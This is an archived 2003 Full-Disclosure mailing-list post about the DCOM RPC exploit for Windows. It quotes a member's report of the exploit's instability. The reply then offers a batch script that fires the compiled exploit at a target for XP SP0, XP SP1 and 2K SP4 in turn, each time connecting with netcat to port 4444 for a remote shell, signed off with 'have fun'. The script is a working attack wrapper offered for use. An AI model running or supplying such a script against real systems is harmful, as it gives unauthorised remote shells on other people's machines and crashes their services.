[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Law11-OE21FCn2RnXVb00008a45@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: dcom exploit code observations
----- Original Message -----
From: "john" <seclist@...esec.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, July 28, 2003 7:42 AM
Subject: [Full-Disclosure] dcom exploit code observations
> Downloaded the revised exploit code by HD moore and got it compiled on a
> linux box.
>
> There seems to either be some flaws in the exploit code or just a
> general instability of the rpc service.
>
> If the code is run against a vulnerable box and the right SP level
> setting is not correct it crashes the rpc service and shuts down the
> port. Restarting the service will bring it back online. If the attack is
> successful you get a nice pretty windows shell. If you exit the shell
> the rpc service again crashes.
>
> I am sure the code will be revised to eliminate these problems.
>
> John
>
THIS IS NOT THE CASE...
this .bat works perfect...
------------ snip -------------------
@echo on
@echo .....................................................
@echo RPC script by morning_wood
@echo ....................................................
wait
@echo ...
@echo trying XP Service Pack 0
dcom32 5 %1
nc -v -n %1 4444
wait
@echo trying XP Service Pack 1
dcom32 6 %1
nc -v -n %1 4444
wait
@echo trying 2K Service Pack 4
dcom32 4 %1
nc -v -n %1 4444
wait
@echo ........... have fun
wait
@echo bye now
exit
-------- snip -------------------
w00d
Powered by blists - more mailing lists